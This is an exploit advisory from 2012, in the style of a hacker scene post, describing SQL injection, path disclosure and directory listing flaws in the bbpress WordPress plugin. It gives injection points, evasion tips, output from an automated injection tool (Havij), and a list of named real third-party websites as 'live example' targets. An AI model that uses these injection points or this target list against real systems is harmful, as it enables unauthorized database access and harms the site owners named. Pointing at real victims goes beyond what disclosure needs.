WordPress BBPress SQL Injection / Path Disclosure

# Exploit Title: Wordpress plugins - bbpress Multiple Vulnerabilities.
# Date: 31 August 2012
# Author: Dark-Puzzle (Souhail Hammou)
# Vendor Website : www.bbpress.ru / www.bbpress.com
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 , Backtrack 5 R3 .
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...

----------------------------------------------------
I - SQL Injection Vulnerability :
----------------------------------------------------
bbpress plugin is prone to an SQL injection Vulnerability .
In cases when you face a valid string column problem try to change syntax or instead spaces add /**/ .

Note: Automated injection can be more effective .

Proof : ( take Havij for example)

Host IP: 127.0.0.1
Web Server: Apache
Keyword Found: bb
Injection type is Integer
Keyword corrected: 0.062
DB Server: MySQL unknown ver
Trying another method using keyword for finding columns count
Selected Column Count is 12
trying to find string column
Valid String Column is 3
Current DB: test_db

Example Sites :
http://marcoemarco.altervista.org/wp-content/plugins/bbpress/forum.php?id=1&page=[Inject Here]
http://www.compagniealluna.com/wp-content/plugins/bbpress/forum.php?id=1&page=[Inject here]

---------------------------------------------------
II - Full Disclosure Vulnerability :
---------------------------------------------------

The Full Path Disclosure vulnerability in bbpress is via Array .

Example :

www.example.com/path/bbpress/topic.php?id[]=12&replies=3

Error : Warning: urlencode() expects parameter 1 to be string, array given in /Full/Path/Here on line 786

Live Example Sites :

http://www.compagniealluna.com/wp-content/plugins/bbpress/topic.php?id[]=1017&replies=1
http://kghf.ru/wp-content/plugins/bbpress/topic.php?id[]=70&replies=1
http://tg.elsendorf.de/wp/wp-content/plugins/bbpress/topic.php?id[]=501&replies=1
http://tg.elsendorf.de/wp/wp-content/plugins/bbpress/forum.php?id[]=1

---------------------------------------------------
III - Directory Listing Vulnerability :
---------------------------------------------------

www.example.com/PATH/bbpress/bb-templates/kakumei/
www.example.com/PATH/bbpress/bb-templates/kakumei-blue/

---------------------------------------------------
# Datasec Team

源链接

Hacking more

...